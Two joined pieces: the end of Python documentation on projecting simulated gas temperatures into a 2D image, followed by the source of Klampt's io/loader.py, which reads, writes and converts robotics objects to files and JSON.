grid = 250 #image will have grid x grid pixels
# parameters to compute column density
plane = 'XY' #plane to project the region: 'XY', 'YZ', 'XZ'
periodic = True #whether treat image as periodic in the considered plane
# KDTree parameters
k = 32 #number of neighborghs
threads = -1
##################################################################################
# read gas position and masses
f = h5py.File(snapshot, 'r')
BoxSize = f['Header'].attrs[u'BoxSize']/1e3 #Mpc/h
redshift = f['Header'].attrs[u'Redshift']
pos_g = f['PartType0/Coordinates'][:]/1e3 #Mpc/h
pos_g = pos_g.astype(np.float32) #positions as float32
Mg = f['PartType0/Masses'][:]*1e10 #Msun/h
f.close()
T = CL.temperature(snapshot) #K
Rg = CL.KDTree_distance(pos_g, pos_g, k, BoxSize*(1.0+1e-8), threads, verbose=False) #Mpc/h
Rg = Rg.astype(np.float32) #radii as float32
# select the particles in the considered region
indexes = np.where((pos_g[:,0]>x_min) & (pos_g[:,0]<x_max) &
(pos_g[:,1]>y_min) & (pos_g[:,1]<y_max) &
(pos_g[:,2]>z_min) & (pos_g[:,2]<z_max))[0]
pos_g_ = pos_g[indexes]
T_ = T[indexes]
Mg_ = Mg[indexes]
Rg_ = Rg[indexes]
if plane=='XY': axis_x, axis_y, width = 0, 1, x_max-x_min
elif plane=='YZ': axis_x, axis_y, width = 1, 2, y_max-y_min
elif plane=='XZ': axis_x, axis_y, width = 0, 2, z_max-z_min
# project gas mass*temperatures into a 2D map
TM = np.zeros((grid,grid), dtype=np.float64)
MASL.voronoi_RT_2D(TM, pos_g_, T_*Mg_, Rg_, x_min, y_min,
axis_x, axis_y, width, periodic, verbose=True)
# project gas mass into a 2D map
M = np.zeros((grid,grid), dtype=np.float64)
MASL.voronoi_RT_2D(M, pos_g_, Mg_, Rg_, x_min, y_min,
axis_x, axis_y, width, periodic, verbose=True)
# compute mean temperature
T = TM/M
print('%.3e < T < %.3e'%(np.min(T), np.max(T)))
# save image to file
np.save(f_out, T)
The image can be plotted with something like this:
.. code-block:: python
import numpy as np
from pylab import *
from matplotlib.colors import LogNorm
image = np.load('gas_temperature.npy')
f_out = 'gas_temperature.png'
fig = figure()
ax1 = fig.add_subplot(111)
ax1.imshow(image.T, cmap=get_cmap('binary_r'), origin='lower', interpolation='bicubic',
extent=[0,25,0,25], norm = LogNorm(vmin=2e3,vmax=1e7))
savefig(f_out, bbox_inches='tight')
close(fig)
Producing this image:
.. image:: gas_temperature.png
:align: center
The most important thing is to define the radius of the gas particles. There are multiple possibilities for this:
- For IllustrisTNG, each gas particle can be approximated as sphere with the same volume as the one of its voronoi cell, i.e., :math:`R=(3M/(4\pi\rho))^{1/3}`.
- The above radius definition can be expanded by an overll factor to avoid empty regions.
- The radius can be considered as the distance to the k nearest gas particle.
The below image shows how different definitions led to different results:
.. image:: gas_temperature_zoom.png
We recommend using as radius of a gas particle the distance to its 32th nearest gas particle.
3D fields slices
----------------
| PypiClean |
/Klampt-0.9.0-cp36-cp36m-win_amd64.whl/klampt/io/loader.py | from ..robotsim import *
from ..math import so3,vectorops
from ..model.contact import ContactPoint, Hold
from ..model.trajectory import Trajectory,HermiteTrajectory,SO3Trajectory,SE3Trajectory
from ..model import types
import os
import warnings
EXTENSION_TO_TYPES = {'.config':['Config'],
'.configs':['Configs'],
'.tri':['Geometry3D','TriangleMesh'],
'.off':['Geometry3D','TriangleMesh'],
'.stl':['Geometry3D','TriangleMesh'],
'.ply':['Geometry3D','TriangleMesh'],
'.wrl':['Geometry3D','TriangleMesh'],
'.dae':['Geometry3D','TriangleMesh'],
'.poly':['Geometry3D','TriangleMesh'],
'.geom':['Geometry3D','GeometricPrimitive'],
'.pcd':['Geometry3D','PointCloud'],
'.vector3':['Vector3'],
'.matrix3':['Matrix3'],
'.ikgoal':['IKGoal'],
'.xform':['RigidTransform'],
'.path':['Trajectory','LinearPath','SE3Trajectory','SO3Trajectory'],
'.hold':['Hold'],
'.stance':['Stance'],
'.grasp':['Grasp'],
'.rob':['RobotModel'],
'.urdf':['RobotModel'],
'.obj':['Geometry3D','RigidObjectModel','TriangleMesh'],
'.env':['TerrainModel'],
'.xml':['WorldModel','MultiPath']
}
"""dict mapping file extensions to lists of compatible Klampt types."""
UNSUPPORTED_JSON_TYPES = ['Geometry3D','TriangleMesh','PointCloud','GeometricPrimitive','VolumeGrid',
'RobotModel','RigidObjectModel','TerrainModel','WorldModel']
"""List of Klampt types that cannot currently be exported to JSON"""
TYPE_TO_EXTENSIONS = dict()
"""dict mapping Klamp't types to lists of compatible file extensions."""
for (k,v) in list(EXTENSION_TO_TYPES.items()):
for t in v:
if t in TYPE_TO_EXTENSIONS:
TYPE_TO_EXTENSIONS[t].append(k)
else:
TYPE_TO_EXTENSIONS[t] = [k]
def filename_to_types(name):
"""Returns the Klampt types possibly represented by the given filename's
extension.
"""
fileName, fileExtension = os.path.splitext(name)
fileExtension = fileExtension.lower()
if fileExtension in EXTENSION_TO_TYPES:
return EXTENSION_TO_TYPES[fileExtension]
else:
raise RuntimeError("Cannot determine type of object from filename "+name)
def filename_to_type(name):
"""Returns one Klampt type represented by the given filename's
extension.
If the file is a dynamic type (.xml or .json), just 'xml' or 'json' is
returned because the type will need to be determined after parsing the
file.
If the type is ambiguous (like .obj), the first type in EXTENSION_TO_TYPES
is returned.
Returns:
str: The Klamp't type
"""
fileName, fileExtension = os.path.splitext(name)
fileExtension = fileExtension.lower()
if fileExtension == '.xml':
return 'xml' #dynamic loading
elif fileExtension == '.json':
return 'json' #dynamic loading
elif fileExtension in EXTENSION_TO_TYPES:
ftypes = EXTENSION_TO_TYPES[fileExtension]
if len(ftypes) > 1 and fileExtension not in ['.path'] and (ftypes[0] != 'Geometry3D' and len(ftypes) > 2):
warnings.warn("loader.filename_to_type(): filename {} is ambiguous, matches types {}".format(name,', '.join(ftypes)))
return ftypes[0]
else:
raise RuntimeError("Cannot determine type of object from filename "+name)
def write_Vector(q):
"""Writes a vector to a string in the length-prepended format 'n v1 ... vn'"""
return str(len(q))+'\t'+' '.join(str(v) for v in q)
def read_Vector(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if len(items) == 0:
raise ValueError("Empty text")
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return [float(v) for v in items[1:]]
def write_Vector_raw(x):
"""Writes a vector to a string in the raw format 'v1 ... vn'"""
return ' '.join(str(xi) for xi in x)
def read_Vector_raw(text):
"""Reads a vector from a raw string 'v1 ... vn'"""
items = text.split()
return [float(v) for v in items]
def write_VectorList(x):
"""Writes a list of vectors to string"""
return '\n'.join(write_Vector(xi) for xi in x)
def read_VectorList(text):
"""Reads a list of endline-separated vectors from a string"""
items = text.split()
vectors = []
pos = 0
while pos < len(items):
n = int(items[pos])
vectors.append([float(v) for v in items[pos+1:pos+1+n]])
pos += 1+n
return vectors
def write_Matrix(x):
"""Writes a matrix to a string in the format
m n
x11 x12 ... x1n
...
xm1 xm2 ... xmn
"""
return '\n'.join([str(len(x))+' '+str(len(x[0]))]+[write_Vector_raw(xi) for xi in x])
def read_Matrix(text):
"""Reads a matrix from a string in the format
m n
x11 x12 ... x1n
...
xm1 xm2 ... xmn
"""
items = text.split()
if len(items) < 2: raise ValueError("Invalid matrix string")
m,n = int(items[0]),int(items[1])
if len(items) != 2 + m*n:
raise ValueError("Invalid number of matrix elements, should be %d, instead got %d"%(m*n,len(items)-2))
k = 2
x = []
for i in range(m):
x.append([float(v) for v in items[k:k+n]])
k += n
return x
def write_so3(x):
"""Writes an so3 element, i.e., rotation matrix, to string in the same
format as written to by Klampt C++ bindings (row major)."""
assert len(x)==9,"Argument must be an so3 element"
return '\t'.join([' '.join([str(mij) for mij in mi ]) for mi in so3.matrix(x)])
def read_so3(text):
"""Reads an so3 element, i.e., rotation matrix, from string in the same
format as written to by Klampt C++ bindings (row major)."""
items = text.split()
if len(items) != 9: raise ValueError("Invalid element of SO3, must have 9 elements")
return so3.inv([float(v) for v in items])
def write_se3(x):
"""Writes an se3 element, i.e., rigid transformation, to string in the
same format as written to by Klampt C++ bindings (row major R, followed by
t)."""
return write_so3(x[0])+'\t'+write_Vector_raw(x[1])
def read_se3(text):
"""Reads an se3 element, i.e., rigid transformation, to string in the
same format as written to by Klampt C++ bindings (row major R, followed by
t)."""
items = text.split()
if len(items) != 12: raise ValueError("Invalid element of SE3, must have 12 elements")
return (so3.inv([float(v) for v in items[:9]]),[float(v) for v in items[9:]])
def write_Matrix3(x):
"""Writes a 3x3 matrix to a string"""
return write_so3(so3.from_matrix(x))
def read_Matrix3(text):
"""Reads a 3x3 matrix from a string"""
return so3.matrix(read_so3(text))
def write_ContactPoint(cp):
"""Writes a contact point's members x,n,kFriction"""
return ' '.join(str(v) for v in cp.tolist())
def read_ContactPoint(text):
"""Reads a contact point from a string 'x1 x2 x3 n1 n2 n3 kFriction'"""
items = text.split()
if len(items)!=7:
raise ValueError("Invalid number of items, should be 7")
return ContactPoint([float(v) for v in items[0:3]],[float(v) for v in items[3:6]],float(items[6]))
def write_ContactPoint(cp):
"""Writes a contact point to a string 'x1 x2 x3 n1 n2 n3 kFriction'"""
return ' '.join([str(v) for v in list(cp.x)+list(cp.n)+[cp.kFriction]])
def read_IKObjective(text):
"""Reads an IKObjective from a string in the Klamp't native format
``link destLink posConstraintType [pos constraint items] ...
rotConstraintType [rot constraint items]``
where link and destLink are integers, posConstraintType is one of
* N: no constraint
* P: position constrained to a plane
* L: position constrained to a line
* F: position constrained to a point
and rotConstraintType is one of
* N: no constraint
* T: two-axis constraint (not supported)
* A: rotation constrained about axis
* F: fixed rotation
The [pos constraint items] contain a variable number of whitespace-
separated items, dependending on posConstraintType:
* N: 0 items
* P: the local position xl yl zl, world position x y z on the plane, and
plane normal nx,ny,nz
* L: the local position xl yl zl, world position x y z on the line, and
line axis direction nx,ny,nz
* F: the local position xl yl zl and world position x y z
The [rot constraint items] contain a variable number of whitespace-
separated items, dependending on rotConstraintType:
* N: 0 items
* T: not supported
* A: the local axis xl yl zl and the world axis x y z
* F: the world rotation matrix, in moment (aka exponential map) form
mx my mz (see so3.from_moment())
"""
items = text.split()
if len(items) < 4:
raise ValueError("Not enough items to unpack")
link = int(items[0])
destlink = int(items[1])
ind = 2
posType = None
posLocal = None
posWorld = None
posDirection = None
rotType = None
rotWorld = None
rotAxis = None
#read pos constraint
posType = items[ind]
ind += 1
if posType=='N':
#no constraint
pass
elif posType=='P' or posType=='L':
posLocal = items[ind:ind+3]
ind += 3
posWorld = items[ind:ind+3]
ind += 3
posDirection = items[ind:ind+3]
ind += 3
elif posType=='F':
posLocal = items[ind:ind+3]
ind += 3
posWorld = items[ind:ind+3]
ind += 3
else:
raise ValueError("Invalid pos type "+posType+", must be N,P,L or F")
rotType = items[ind]
ind += 1
if rotType=='N':
#no constraint
pass
elif rotType=='T' or rotType=='A':
rotAxis = items[ind:ind+3]
ind += 3
rotWorld = items[ind:ind+3]
ind += 3
elif rotType=='F':
rotWorld = items[ind:ind+3]
ind += 3
else:
raise ValueError("Invalid rot type "+rotType+", must be N,T,A or F")
if posLocal: posLocal = [float(v) for v in posLocal]
if posWorld: posWorld = [float(v) for v in posWorld]
if posDirection: posDirection = [float(v) for v in posDirection]
if rotAxis: rotAxis = [float(v) for v in rotAxis]
if rotWorld: rotWorld = [float(v) for v in rotWorld]
obj = IKObjective()
obj.setLinks(link,destlink);
if posType=='N':
obj.setFreePosConstraint()
elif posType=='F':
obj.setFixedPosConstraint(posLocal,posWorld)
elif posType=='P':
obj.setPlanePosConstraint(posLocal,posDirection,vectorops.dot(posDirection,posWorld))
else:
obj.setLinearPosConstraint(posLocal,posWorld,posDirection)
if rotType == 'N':
obj.setFreeRotConstraint()
elif rotType == 'F':
#fixed constraint
R = so3.from_moment(rotWorld)
obj.setFixedRotConstraint(R)
elif rotType == 'A':
obj.setAxialRotConstraint(rotAxis,rotWorld)
else:
raise NotImplementedError("Two-axis rotational constraints not supported")
return obj
def write_IKObjective(obj):
return obj.saveString()
def read_Hold(text):
"""Loads a Hold from a string"""
lines = parse_lines(text)
if lines[0] != 'begin hold':
raise ValueError('Invalid hold begin text')
if lines[-1] != 'end':
raise ValueError('Invalid hold end text')
h = Hold()
posLocal = None
posWorld = None
localPos0 = None
rotAxis = None
rotWorld = None
iktype = 0
for l in lines[1:-1]:
items = l.split()
if items[1] != '=':
raise ValueError("Invalid line format")
if items[0] == 'link':
h.link = int(items[2])
elif items[0] == 'contacts':
ind = 2
while ind < len(items):
h.contacts.append(read_ContactPoint(' '.join(items[ind:ind+7])))
ind += 7
elif items[0] == "position":
posLocal = [float(v) for v in items[2:5]]
posWorld = [float(v) for v in items[5:8]]
elif items[0] == "axis":
rotAxis = [float(v) for v in items[2:5]]
rotWorld = [float(v) for v in items[5:8]]
elif items[0] == "rotation":
rotWorld = [float(v) for v in items[2:5]]
elif items[0] == "ikparams":
localPos0 = [float(v) for v in items[2:5]]
rotWorld = [float(v) for v in items[5:8]]
iktype = 1
else:
raise ValueError("Invalid item "+items[0])
if iktype == 0:
h.ikConstraint = IKObjective()
if posLocal==None:
raise ValueError("Hold must have some point constraint")
if rotWorld==None:
h.ikConstraint.setFixedPoint(h.link,posLocal,posWorld)
elif rotAxis==None:
R = so3.from_moment(rotWorld)
t = vectorops.sub(posWorld,so3.apply(R,posLocal))
h.ikConstraint.setFixedTransform(h.link,R,t)
else:
raise NotImplementedError("Can't do axis rotation yet")
h.ikConstraint.setAxisRotation(h.link,posLocal,posWorld,localAxis,worldAxis)
else:
raise NotImplementedError("other ik specifications not done yet")
h.setupIKConstraint(localPos0,rotWorld)
return h
def write_Hold(h):
"""Writes a Hold to a string"""
text = "begin hold\n"
text += " link = "+str(h.link)+"\n"
text += " contacts = ";
text += " \\\n ".join([write_ContactPoint(c) for c in h.contacts])
text += "\n"
localPos, worldPos = h.ikConstraint.getPosition()
text += " position = "+" ".join(str(v) for v in localPos)+" \\\n"
text += " "+" ".join(str(v) for v in worldPos)+"\n"
#TODO: write ik constraint rotation
if h.ikConstraint.numRotDims()==3:
#fixed rotation
m = so3.moment(h.ikConstraint.getRotation())
text += "rotation = "+" ".join(str(v) for v in m)+"\n"
elif h.ikConstraint.numRotDims()==1:
locAxis,worldAxis = h.ikConstraint.getRotationAxis()
text += "axis = "+" ".join(str(v) for v in locAxis)+" \\\n"
text += " "+" ".join(str(v) for v in worldAxis)+"\n"
text += "end"
return text
def write_GeometricPrimitive(g):
return g.saveString()
def read_GeometricPrimitive(text):
g = GeometricPrimitive()
if not g.loadString(text):
raise RuntimeError("Error reading GeometricPrimitive from string")
return g
def read_IntArray(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return [int(v) for v in items[1:]]
def read_StringArray(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return items[1:]
def parse_lines(text):
"""Returns a list of lines from the given text. Understands end-of-line escapes '\\n'"""
lines = text.strip().split('\n')
esclines = []
esc = False
for l in lines:
if esc:
esclines[-1] = esclines[-1]+l
else:
esclines.append(l)
if len(l)>0 and l[-1]=='\\':
esclines[-1] = esclines[-1][:-1]
esc = True
else:
esc = False
return esclines
readers = {'Config':read_Vector,
'Vector':read_Vector,
'Configs':read_VectorList,
'Vector3':read_Vector_raw,
'Matrix':read_Matrix,
'Matrix3':read_Matrix3,
'Rotation':read_so3,
'RigidTransform':read_se3,
'IKObjective':read_IKObjective,
'IKGoal':read_IKObjective,
'Hold':read_Hold,
'GeometricPrimitive':read_GeometricPrimitive,
'IntArray':read_IntArray,
'StringArray':read_StringArray,
}
writers = {'Config':write_Vector,
'Vector':write_Vector,
'Configs':write_VectorList,
'Vector3':write_Vector_raw,
'Matrix':write_Matrix,
'Matrix3':write_Matrix3,
'Rotation':write_so3,
'RigidTransform':write_se3,
'IKObjective':write_IKObjective,
'IKGoal':write_IKObjective,
'Hold':write_Hold,
'GeometricPrimitive':write_GeometricPrimitive,
'IntArray':write_Vector,
'StringArray':write_Vector,
}
def write(obj,type):
"""General-purpose write of an arbitrary Klampt object to a str.
Args:
obj: A Klampt object
type (str): Either the Klamp't type, 'json', or 'auto'. If 'auto', the
type will be auto-detected from the object.
Returns:
str: The encoding of the object.
"""
global writers
if type == 'auto':
type = types.object_to_type(obj,writers)
if type is None:
raise ValueError("Can't determine a writable type for object of type "+obj.__class__.__name__)
elif type == 'json':
import json
return json.dumps(to_json(obj))
if type not in writers:
raise ValueError("Writing of objects of type "+type+" not supported")
return writers[type](obj)
def read(type,text):
"""General-purpose read of an arbitrary Klampt object from a str.
Args:
type (str): Either the Klamp't type, or 'json'. Future versions may
support 'xml' but this is not supported right now. 'auto' may
not be specified.
text (str): A string containing the object data.
Returns:
Klamp't object
"""
global readers
if type == 'json':
import json
jsonobj = json.loads(text)
return from_json(jsonobj)
if type not in readers:
raise ValueError("Reading of objects of type "+type+" not supported")
return readers[type](text)
def load_WorldModel(fn):
w = WorldModel()
if not w.loadFile(fn):
raise IOError("Error reading WorldModel from "+fn)
return w
def load_Geometry3D(fn):
g = Geometry3D()
if not g.loadFile(fn):
raise IOError("Error reading Geometry3D from "+fn)
return g
def load_Trajectory(fn):
value = Trajectory()
value.load(fn)
return value
def load_MultiPath(fn):
from ..model import multipath
value = multipath.MultiPath()
value.load(fn)
return value
def load_dynamic_xml(fn):
#XML types may only be a WorldModel or MultiPath
value = WorldModel()
res = value.readFile(fn)
if res:
return value
try:
return load_MultiPath(fn)
except Exception as e:
raise
loaders = {'Trajectory':load_Trajectory,
'LinearPath':load_Trajectory,
'MultiPath':load_MultiPath,
'Geometry3D':load_Geometry3D,
'WorldModel':load_WorldModel,
'xml':load_dynamic_xml
}
savers = {'Trajectory':lambda x,fn:x.save(fn),
'LinearPath':lambda x,fn:x.save(fn),
'MultiPath':lambda x,fn:x.save(fn),
'Geometry3D':lambda x,fn:x.save(fn),
'WorldModel':lambda x,fn:x.writeFile(fn),
}
def save(obj,type,fn):
"""General-purpose save of an arbitrary Klampt object to a file.
This also works with RobotModel, RigidObjectModel, and TerrainModel
(which don't work with load).
Args:
obj: a Klamp't object.
type (str): the Klampt type, 'json', or 'auto'
fn (str): a file name
Returns:
bool: True if successful.
"""
global savers,writers
if hasattr(obj,'saveFile'):
return obj.saveFile(fn)
if type == 'auto':
savers_and_writers = list(savers.keys()) + list(writers.keys())
type = types.object_to_type(obj,savers_and_writers)
if type is None:
raise ValueError("Can't determine a savable type for object of type "+obj.__class__.__name__)
elif type == 'json':
import json
with open(fn,'w') as f:
json.dump(to_json(obj),f)
return True
if type in savers:
return savers[type](obj,fn)
elif type in writers:
with open(fn,'w') as f:
f.write(writers[type](obj)+'\n')
return True
else:
raise ValueError("Saving of type "+type+" is not supported")
def load(type,fn):
"""General-purpose load of an arbitrary Klampt object from a file
or URL.
An exception is raised if there is an error loading or
parsing the file. Possible exception types include IOError,
ValueError, and HTTPError.
Args:
type (str): a Klamp't type, 'json', or 'auto'
fn (str): a filename.
Returns:
Klamp't object
"""
if type == 'auto':
type = filename_to_type(fn)
global loaders,readers
cppurl = False
if type == 'WorldModel' or (type == 'Geometry3D' and fn.find('ros://') >= 0): #these two types handle URLs in C++ API
cppurl = True
if not cppurl and fn.find('://') >= 0:
import urllib.request, urllib.error, urllib.parse
src = None
data = None
try:
src = urllib.request.urlopen(fn)
data = src.read()
print("klampt.io.loader.load(): Download %s HTTP response code %s, size %d bytes"%(fn,src.getcode(),len(data)))
finally:
if src:
src.close()
if type in loaders:
#need to write to temporary file
import os
import tempfile
local_filename = None
fileName, suffix = os.path.splitext(fn)
with tempfile.NamedTemporaryFile(delete=False,suffix=suffix) as tmp_file:
local_filename = tmp_file.name
print("klampt.io.loader.load(): saving data to temp file",local_filename)
tmp_file.write(data)
tmp_file.flush()
res = loaders[type](local_filename)
os.remove(local_filename)
elif type in readers or type == 'json':
res = readers[type](data)
else:
raise ValueError("Loading of type "+type+" is not supported")
return res
if type in loaders:
return loaders[type](fn)
elif type in readers or type == 'json':
text = None
with open(fn,'r') as f:
text = ''.join(f.readlines())
return read(type,text)
else:
raise ValueError("Loading of type "+type+" is not supported")
def to_json(obj,type='auto'):
"""Converts from a Klamp't object to a JSON-compatible structure.
The resulting structure can be converted to a JSON string using
``json.dumps()`` in the Python builtin ``json`` module.
Not all objects are supported yet, notably geometry-related objects and
world entities.
Args:
obj: A Klamp't object.
type (str, optional): the type of the object (see
:mod:`~klampt.model.types`) If 'auto' (default), the type of the
object is inferred automatically.
"""
if type == 'auto':
if isinstance(obj,(list,tuple)):
if all([isinstance(v,(bool,int,float)) for v in obj]):
type = 'Vector'
else:
if len(obj)==2 and len(obj[0])==9 and len(obj[1])==3:
type = 'RigidTransform'
else:
isconfigs = True
for item in obj:
if not all([isinstance(v,(bool,int,float)) for v in item]):
isconfigs = False
if isconfigs:
type = 'Configs'
else:
raise TypeError("Could not parse object "+str(obj))
elif isinstance(obj,(bool,int,float,str)):
type = 'Value'
elif obj.__class__.__name__ in ['ContactPoint','IKObjective','Trajectory','MultiPath','GeometricPrimitive','TriangleMesh','ConvexHull','PointCloud','VolumeGrid','Geometry3D']:
type = obj.__class__.__name__
elif isinstance(obj,Trajectory): #some subclasses of Trajectory may be used here too
type = obj.__class__.__name__
else:
raise TypeError("Unknown object of type "+obj.__class__.__name__)
if type in ['Config','Configs','Vector','Matrix','Vector2','Vector3','Matrix3','Point','Rotation','Value','IntArray','StringArray']:
return obj
elif type == 'RigidTransform':
return obj
elif type == 'ContactPoint':
return {'x':obj.x,'n':obj.n,'kFriction':obj.kFriction}
elif type == 'Trajectory' or type == 'LinearPath':
return {'times':obj.times,'milestones':obj.milestones}
elif type.endswith('Trajectory'):
return {'type':type,'times':obj.times,'milestones':obj.milestones}
elif type == 'IKObjective' or type == 'IKGoal':
res = {'type':type,'link':obj.link()}
if obj.destLink() >= 0:
res['destLink'] = obj.destLink()
if obj.numPosDims()==3:
res['posConstraint']='fixed'
res['localPosition'],res['endPosition']=obj.getPosition()
elif obj.numPosDims()==2:
res['posConstraint']='linear'
res['localPosition'],res['endPosition']=obj.getPosition()
res['direction']=obj.getPositionDirection()
elif obj.numPosDims()==1:
res['posConstraint']='planar'
res['localPosition'],res['endPosition']=obj.getPosition()
res['direction']=obj.getPositionDirection()
else:
#less verbose to just eliminate this
#res['posConstraint']='free'
pass
if obj.numRotDims()==3:
res['rotConstraint']='fixed'
res['endRotation']=so3.moment(obj.getRotation())
elif obj.numRotDims()==2:
res['rotConstraint']='axis'
res['localAxis'],res['endRotation']=obj.getRotationAxis()
elif obj.numRotDims()==1:
raise NotImplementedError("twoaxis constraints are not implemented in Klampt")
else:
#less verbose to just eliminate this
#res['rotConstraint']='free'
pass
return res
elif type == 'TriangleMesh':
inds = list(obj.indices)
inds = [inds[i*3:i*3+3] for i in range(len(inds)//3)]
verts = list(obj.vertices)
verts = [verts[i*3:i*3+3] for i in range(len(verts)//3)]
return {'type':type,'indices':inds,'vertices':verts}
elif type == 'PointCloud':
verts = list(obj.vertices)
verts = [verts[i*3:i*3+3] for i in range(len(verts)//3)]
res = {'type':type,'vertices':verts}
propNames = list(obj.propertyNames)
if len(propNames) > 0:
res['propertyNames'] = propNames
if len(verts) * len(propNames) > 0:
n = len(verts)
k = len(propNames)
props = list(obj.properties)
props = [props[i*k:i*k+k] for i in range(n)]
res['properties'] = props
#TODO: settings
return res
elif type == 'VolumeGrid':
res = {'type':type}
res['bmin'] = [obj.bbox[i] for i in range(3)]
res['bmax'] = [obj.bbox[i] for i in range(3,6)]
res['dims'] = list(obj.dims)
res['values'] = list(obj.values)
return res
elif type == 'ConvexHull':
points = [[obj.points[i],obj.points[i+1],obj.points[i+2]] for i in range(0,len(obj.points),3)]
return {'type':type,'points':points}
elif type == 'Geometry3D':
data = None
gtype = obj.type()
if gtype == 'GeometricPrimitive':
data = to_json(obj.getGeometricPrimitive(),gtype)
elif gtype == 'TriangleMesh':
data = to_json(obj.getTriangleMesh(),gtype)
elif gtype == 'PointCloud':
data = to_json(obj.getPointCloud(),gtype)
elif gtype == 'ConvexHull':
data = to_json(obj.getConvexHull(),gtype)
elif gtype == 'VolumeGrid':
data = to_json(obj.getVolumeGrid(),gtype)
elif gtype == 'Group':
data = [to_json(obj.getElement(i)) for i in range(obj.numElements())]
return {'type':type,'datatype':gtype,'data':data}
elif type in writers:
return {'type':type,'data':write(obj,type)}
else:
raise ValueError("Unknown or unsupported type "+type)
def from_json(jsonobj,type='auto'):
"""Converts from a JSON structure to a Klamp't object of the appropriate
type.
Note: a JSON structure can be created from a JSON string using the
``json.loads()`` function in the Python builtin ``json`` module.
Not all objects are supported yet, notably geometry-related objects and
world entities.
Args:
jsonobj: A JSON structure (i.e., one coming from :func:`to_json`)
type (str, optional): the type of the object (see
:mod:`~klampt.model.types`) If 'auto' (default), the type of the
object is inferred automatically.
"""
if type == 'auto':
if isinstance(jsonobj,(list,tuple)):
return jsonobj
elif isinstance(jsonobj,(bool,int,float,str)):
return jsonobj
elif isinstance(jsonobj,dict):
if 'type' in jsonobj:
type = jsonobj["type"]
elif 'times' in jsonobj and 'milestones' in jsonobj:
type = 'Trajectory'
elif 'x' in jsonobj and 'n' in jsonobj and 'kFriction' in jsonobj:
type = 'ContactPoint'
else:
raise TypeError("Unknown JSON object of type "+jsonobj.__class__.__name)
if type in ['Config','Configs','Vector','Matrix','Matrix3','Rotation','Value','IntArray','StringArray']:
return jsonobj
elif type == 'RigidTransform':
return jsonobj
elif type == 'ContactPoint':
return ContactPoint(jsonobj['x'],jsonobj['n'],jsonobj['kFriction'])
elif type == 'Trajectory' or type == 'LinearPath':
return Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'HermiteTrajectory':
return HermiteTrajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'SO3Trajectory':
return SO3Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'SE3Trajectory':
return SO3Trajectory(jsonobj['times'],jsonobj['milestones'])
elif type == 'IKObjective' or type == 'IKGoal':
link = jsonobj['link']
destlink = jsonobj['destLink'] if 'destLink' in jsonobj else -1
posConstraint = 'free'
rotConstraint = 'free'
localPosition = endPosition = None
direction = None
endRotation = None
localAxis = None
if 'posConstraint' in jsonobj:
posConstraint = jsonobj['posConstraint']
if 'rotConstraint' in jsonobj:
rotConstraint = jsonobj['rotConstraint']
if posConstraint == 'planar' or posConstraint == 'linear':
direction = jsonobj['direction']
if posConstraint != 'free':
localPosition = jsonobj['localPosition']
endPosition = jsonobj['endPosition']
if rotConstraint != 'free':
endRotation = jsonobj['endRotation']
if rotConstraint == 'axis' or rotConstraint == 'twoaxis':
localAxis = jsonobj['localAxis']
if posConstraint == 'free' and rotConstraint == 'free':
#empty
return IKObjective()
elif posConstraint != 'fixed':
raise NotImplementedError("Can't do non-fixed position constraints yet in Python API")
if rotConstraint == 'twoaxis':
raise NotImplementedError("twoaxis constraints are not implemented in Klampt")
if rotConstraint == 'free':
obj = IKObjective()
if destlink >= 0:
obj.setRelativePoint(link,destlink,localPosition,endPosition)
else:
obj.setFixedPoint(link,localPosition,endPosition)
return obj
elif rotConstraint == 'axis':
obj = IKObjective()
h = 0.1
lpts = [vectorops.madd(localPosition,localAxis,-h),vectorops.madd(localPosition,localAxis,h)]
wpts = [vectorops.madd(endPosition,endRotation,-h),vectorops.madd(endPosition,endRotation,h)]
if destlink >= 0:
obj.setRelativePoints(link,destlink,lpts,wpts)
else:
obj.setFixedPoints(link,lpts,wpts)
return obj
elif rotConstraint == 'fixed':
obj = IKObjective()
R = so3.from_moment(endRotation)
t = vectorops.sub(endPosition,so3.apply(R,localPosition))
obj.setFixedTransform(link,R,t)
return obj
else:
raise ValueError("Invalid IK rotation constraint "+rotConstraint)
elif type == 'TriangleMesh':
inds = sum(jsonobj['indices'],[])
verts = sum(jsonobj['vertices'],[])
mesh = TriangleMesh()
mesh.indices.resize(len(inds))
mesh.vertices.resize(len(verts))
for i,v in enumerate(inds):
mesh.indices[i] = v
for i,v in enumerate(verts):
mesh.vertices[i] = v
return mesh
elif type == 'PointCloud':
pc = PointCloud()
verts = sum(jsonobj['vertices'],[])
pc.vertices.resize(len(verts))
for i,v in enumerate(verts):
pc.vertices[i] = v
if 'propertyNames' in jsonobj:
propNames = jsonobj['propertyNames']
pc.propertyNames.resize(len(propNames))
for i,v in enumerate(propNames):
pc.propertyNames[i] = v
if 'properties' in jsonobj:
props = sum(jsonobj['properties'])
pc.properties.resize(len(props))
for i,v in enumerate(props):
pc.properties[i] = v
#TODO: settings
return pc
elif type == 'VolumeGrid':
vg = VolumeGrid()
bbox = jsonobj['bmin'] + jsonobj['bmax']
vg.bbox.resize(6)
for i,v in enumerate(bbox):
vg.bbox[i] = v
vg.dims.resize(3)
for i,v in enumerate(jsonobj['dims']):
vg.dims[i] = v
values = jsonobj['values']
vg.values.resize(len(values))
for i,v in enumerate(values):
vg.values[i] = v
return vg
elif type == 'ConvexHull':
ch = ConvexHull()
points = sum(jsonobj['points'])
ch.points.resize(len(points))
for i,v in enumerate(points):
ch.points[i] = v
return ch
elif type == 'Geometry3D':
gtype = jsonobj['datatype']
if gtype == '':
return Geometry3D()
return Geometry3D(from_json(jsonobj['data'],gtype))
elif type in readers:
return read(type,jsonobj["data"])
else:
raise ValueError("Unknown or unsupported type "+type)
def _deprecated_func(oldName,newName):
import sys
mod = sys.modules[__name__]
f = getattr(mod,newName)
def depf(*args,**kwargs):
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(oldName,newName),DeprecationWarning)
return f(*args,**kwargs)
depf.__doc__ = 'Deprecated in a future version of Klampt. Use {} instead'.format(newName)
